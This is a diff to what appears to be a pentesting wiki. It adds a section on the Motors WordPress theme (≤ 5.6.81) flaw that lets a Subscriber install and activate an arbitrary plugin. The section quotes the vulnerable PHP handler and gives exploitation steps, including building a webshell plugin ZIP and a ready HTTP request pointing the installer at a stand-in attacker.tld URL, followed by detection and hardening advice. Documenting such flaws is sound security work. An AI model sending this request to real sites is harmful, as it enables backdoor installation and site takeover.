Critical Arbitrary File Upload Vulnerability in Motors Theme...

src/SUMMARY.md

@@ -372,6 +372,7 @@
     - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
   - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
   - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
+  - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
   - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
   - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
   - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)

src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md

@@ -81,3 +81,4 @@ adb shell ime help
 - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
 - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI).
 
+{{#include ../../banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-web/wordpress.md

@@ -862,6 +862,59 @@ Hardening
 - Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code
 - Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows
 
+### Subscriber+ AJAX plugin installer → forced malicious activation (Motors Theme ≤ 5.6.81)
+
+[Patchstack's analysis](https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/) showed how the Motors theme ships an authenticated AJAX helper for installing its companion plugin:
+
+```php
+add_action('wp_ajax_mvl_theme_install_base', 'mvl_theme_install_base');
+
+function mvl_theme_install_base() {
+    check_ajax_referer('mvl_theme_install_base', 'nonce');
+
+    $plugin_url  = sanitize_text_field($_GET['plugin']);
+    $plugin_slug = 'motors-car-dealership-classified-listings';
+
+    $upgrader = new Plugin_Upgrader(new Motors_Theme_Plugin_Upgrader_Skin(['plugin' => $plugin_slug]));
+    $upgrader->install($plugin_url);
+    mvl_theme_activate_plugin($plugin_slug);
+}
+```
+
+- Only `check_ajax_referer()` is called; there is no `current_user_can('install_plugins')` or `current_user_can('activate_plugins')`.
+- The nonce is embedded in the Motors admin page, so any Subscriber that can open `/wp-admin/` can copy it from the HTML/JS.
+- The handler trusts the attacker-controlled `plugin` parameter (read from `$_GET`) and passes it into `Plugin_Upgrader::install()`, so an arbitrary remote ZIP is downloaded into `wp-content/plugins/`.
+- After installation the theme unconditionally calls `mvl_theme_activate_plugin()`, guaranteeing execution of the attacker plugin's PHP code.
+
+#### Exploitation flow
+
+1. Register/compromise a low-privileged account (Subscriber is enough) and grab the `mvl_theme_install_base` nonce from the Motors dashboard UI.
+2. Build a plugin ZIP whose top-level directory matches the expected slug `motors-car-dealership-classified-listings/` and embed a backdoor or webshell in the `*.php` entry points.
+3. Host the ZIP and trigger the installer by pointing the handler to your URL:
+
+```http
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: victim.tld
+Cookie: wordpress_logged_in_=...
+Content-Type: application/x-www-form-urlencoded
+
+action=mvl_theme_install_base&nonce=<leaked_nonce>&plugin=https%3A%2F%2Fattacker.tld%2Fmotors-car-dealership-classified-listings.zip
+```
+
+Because the handler reads `$_GET['plugin']`, the same payload can also be sent via the query string.
+
+#### Detection checklist
+
+- Search themes/plugins for `Plugin_Upgrader`, `Theme_Upgrader`, or custom `install_plugin.php` helpers wired to `wp_ajax_*` hooks without capability checks.
+- Inspect any handler that takes a `plugin`, `package`, `source`, or `url` parameter and feeds it into upgrader APIs, especially when the slug is hard-coded but the ZIP contents are not validated.
+- Review admin pages that expose nonces for installer actions—if Subscribers can load the page, assume the nonce leaks.
+
+#### Hardening
+
+- Gate installer AJAX callbacks with `current_user_can('install_plugins')` and `current_user_can('activate_plugins')` after nonce verification; Motors 5.6.82 introduced this check to patch the bug.
+- Refuse untrusted URLs: limit installers to bundled ZIPs or trusted repositories, or enforce signed download manifests.
+- Treat nonces strictly as CSRF tokens; they do not provide authorization and should never replace capability checks.
+
 ---
 
 ## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1)
@@ -931,5 +984,6 @@ Hardening
 - [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability)
 - [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability)
 - [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability)
+- [Critical Arbitrary File Upload Vulnerability in Motors Theme Affecting 20k+ Sites](https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/)
 
 {{#include ../../banners/hacktricks-training.md}}